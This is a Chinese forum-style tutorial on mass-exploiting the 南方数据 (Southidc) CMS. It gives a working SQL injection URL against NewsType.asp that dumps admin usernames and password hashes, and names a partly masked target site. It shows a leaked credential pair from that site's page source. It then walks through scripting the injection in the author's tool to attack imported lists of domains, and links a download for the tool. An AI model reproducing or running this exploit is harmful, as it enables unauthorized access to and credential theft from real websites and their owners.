这里有个南方站点:www.gu*******na.com
这个站点存在一个很老的南方的EXP,我发一下这个EXP:
1
| /NewsType.asp?SmallClass=%27%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20%27%27=%27
|
EXP漏洞文章说明:<南方数据企业0day漏洞爆后台密码> 比较老了。
大家应该都见过了,我也就不给大家讲这个SQL了,反正就是进去之后这个样子:
那既然可以通杀,那么我们就来编写通杀的脚本。
打开我做的这款工具(应该是一个月前写的了,有些老铁应该见过)
界面简陋得很,我2小时完成的,所以大家将就着用,如果反应好的话呢,我就把他完善一下。
选择编写脚本,新建脚本。
我们开始编写代码,这里代码的描述我给大家截一下图。
PS:函数名称自己起的,比较傻,大家将就着用
我们先来说一下原理,我们打开那个南方EXP之后,查看它的源文件,会有这个样子的代码。
1
| javastr=javastr+"<span style=\"font-size:9pt;line-height:15pt\"><img src='images/news.gif' border=0 alt='图片新闻'><a href=\"shownews.asp?id=0\" title=\"cxm|076dc286aac7e0f8\" target=\"_blank\">cxm|076dc286aac7e0f8</a></span> "
|
我们来填写参数
讲一下
参数2是我们获取到的变量,也就是用户所提供的域名
我们怎么获取,很简单用到这个函数:获取变量()
参数1.将用户提供的参数值赋值给变量
获取变量(”域名”)
简单地说就是将域名转给域名这个变量,
我就会自动生成一个内存空间供给这个变量,让他获取这个值。
就像这个样子,变红说明你的代码是正确的。
我们继续上面的来说,GET单的意思是我们GET获取到源代码之后,进行文本获取。
参数3和参数4我们需要放到
这个文本地址的文件夹
这个txt的文件名字大家随便起
里面的内容就是我们说的那个前文本后文本
保存好后,我们把下面的代码打完。
GET单
1
| (“域名/NewsType.asp?SmallClass=%27%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20%27%27=%27”,“域名”,“南方前文本.txt”,"南方后文本.txt")
|
第3,第4个参数我不赘述了,我只说一下第2个参数。
很简单,第二个参数就是将第一个参数里的那个内容(这里是域名),替换为这个变量的内容
我们之前申请好了变量(域名),也就是用户所传递过来的URL
这样就配置好了一个完整的域名,代码不多,2行就搞定。
获取变量(”域名”) GET单
1
| (“域名/NewsType.asp?SmallClass=%27%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20%27%27=%27”,“域名”,“南方前文本.txt”,"南方后文本.txt")
|
这样我们就完成了,我们试一下效果。
我们把编写好的脚本保存在脚本这个文件夹中。
工具会自动读取这个文件夹重的txt文件。
对了,我还要说一下,我这个给大家自带了一个脚本,是设列,大家一启动就先执行它,
大家也可以看一下他的代码,就明白他的作用了,这里我就不追赘述了。
然后我们导入我们需要爆破的域名
然后选中我们刚编写好的南方脚本。
点击执行。
然后效果就出来了。
为什么前面的ID是0,我这里不想多说,这个是牵扯到其他函数的问题,如果想学其他的函数,
我以后会发教学。
好了,md,终于打完了,如果你从头看到尾,肯定很累,感谢对我的尊重。 byebye
工具下载地址:
链接: http://pan.baidu.com/s/1kVLwQ0n 提取密码: aw1v